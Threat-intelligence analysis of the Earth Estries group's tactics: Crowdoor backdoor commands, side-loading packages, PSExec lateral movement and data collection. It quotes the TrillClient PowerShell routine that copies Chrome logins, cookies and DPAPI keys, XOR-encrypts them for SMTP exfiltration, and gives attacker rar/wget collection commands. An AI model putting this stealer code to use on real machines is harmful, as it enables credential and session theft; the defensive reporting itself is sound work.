Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations

Crowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the behaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar to the ones seen in the older variant, with the difference being the injected process (msiexec.exe) and Command IDs (shown in table 2)

Arguments	Action
No argument	Persistence is set through the registry Run key or a service and the backdoor is restarted
0	Persistence is set through the registry Run key or a service and the backdoor is restarted.
1	The backdoor is restarted by injecting to ‘msiexec.exe’
2	The backdoor main function is called

^{Table 1. List of arguments and their corresponding actions}

Old Crowdoor variant	New Crowdoor variant	Functions
0x2347135	0x11736212	Initial connection C2
0x2347136	0x11736213	Collect ComputerName,Username, OS version and hostnet or IP information
0x2347137	0x11736214	Remote shell
0x234713B	0x11736218	Delete malware files, persistence and exit
0x2347140	0x1173621D	File related Operation
0x2347141	0x1173621E	Open/ReadFile
0x2347142	0x1173621F	Open/WriteFile
0x2347144	0x11736221	Collect drive information
0x2347145	0x11736222	Search File
0x2347148	0x11736225	CreateDirectory
0x2347149	0x11736226	Rename file or directory
0x234714A	0x11736227	Delete file or Directory
0x234714A	0x11736228	Communication with C&C server

^{Table 2. Comparison between old and new Crowdoor variants}

Package 1	Package 2	Package 3	Package 4
WinStore.exe (Host)	K7Sysmon.exe (Host)	HxTsk.exe (Host)	MsMsRng.exe (Host)
Sqlite3.dll	K7Sysmn1.dll	d3d8.dll	sqlite3.dll
datastate.dll	K7Sysmn2.dll	HxTsk (encrypted)	msimg32.dll
datast.dll	K7Sysmn3.dll		datastate.dll
WinStore (encrypted)	K7Sysmon.dll (encrypted)		MsMsRng (encrypted)

^{Table 3. Crowdoor packages}

Lateral Movement

Earth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB files containing the backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.

Typically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in some instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied and executed to perform the extraction, installation, and execution of the malware. Large scale collection may also be executed using batch files.

In later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation and execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file to act as an indirect persistence mechanism for the actual backdoors.

Discovery, collection and exfiltration

TrillClient’s user credential discovery

Earth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the TrillClient information stealer for this routine, primarily collecting user credentials from browser user profiles. TrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:

foreach($win_user_path in $users_path){

echo D | xcopy \”C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\” \”$copy_dest_path\$win_user_path\Protect\” /E /C /H;

attrib -a -s -r -h \”$copy_dest_path\$win_user_path\*\” /S /D;

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State\” \”$copy_dest_path\$win_user_path\Local State\” /C;

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\” \”$copy_dest_path\$win_user_path\Default\Network\Cookies\” /C

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data\” \”$copy_dest_path\$win_user_path\Default\Login Data\” /C;

$profile_path = Get-ChildItem -Name \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\\\” -Include *Profile* -ErrorAction SilentlyContinue;

foreach($chrome_user_path in $profile_path){

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Network\Cookies\” \”$copy_dest_path\$win_user_path\$chrome_user_path\Network\Cookies\” /C;

echo F | xcopy \“C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Login Data\” \”$copy_dest_path\$win_user_path\$chrome_user_path\Login Data\” /C;

   }
}

Data will be collected from the following folders:

• %LOCALAPPDATA%\Google\Chrome\User Data\Local State
• %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Login Data
• %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Network\Cookies
• %APPDATA%\Microsoft\Protect\*

The collected data will be temporarily copied to <%TEMP%\browser_temp_data<RANDOM>>, archived using the tar command, and encrypted with an XOR algorithm.

tar -cvf \”$copy_dest_path\tar\” $copy_dest_path;

$e_a = [System.IO.File]::ReadAllBytes(\”$copy_dest_path\tar\”);Remove-Item -Path $copy_dest_path -Recurse;

$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 – ($e_i % 199)));$e_i += 1;

$random_filename = \”300775736611547784207972935122149919289871693\”;

$out_put_file = $out_put_path + \”\\\” + $random_filename;

echo $out_put_file;

[System.IO.File]::WriteAllBytes($out_put_file, $e_a);

The collected data will then be sent to the threat actor’s Gmail account over Simple Mail Transfer Protocol (SMTP).

Collection of sensitive documents

Earth Estries utilizes RAR for collecting information of interest. On this attack scenario, they utilize wget to download target documents from an internal web-based document management platform to a collection folder before archiving them.

• In this instance, a batch file containing commands to download PDF files to the collection directory is executed, containing hardcoded document names:
  • c:\users\public\music\temp\wget.exe -c “hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf” -P c:\users\public\music\temp
• Afterwards, collected PDF’s are archived
  • C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf

Collection via backdoor

Earth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information of interest both from both local and remote locations. Some examples of collection commands performed are as follows:

Example command	Functions
rar.exe  a -m5 <install path>\322.rar \\<remote machine>\c$\<remote path>	Collect Gather information collected by an older generation of infection from a remote machine
rar.exe  a -m5 <install path> \his231.rar “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History”	Collect browser history files, which are of. Of interest to the attackers to be able to compromise more credentials
rar.exe  a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\ <user name> \Downloads\* C:\users\ <user name> \Documents\* -r -y -ta<cutoff date>	Collection ofCollect more recent files and/or documents interacted with by a local user

^{Table 4. Collection commands}

Telemetry suggests that they were exfiltrated through the same methods that the collection command is executed: either through the command-and-control (C&C) channels of their backdoors, or through the same initial access method used to control these tools.

An overview of the second Earth Estries attack flow is shown in figure 3:

Read More HERE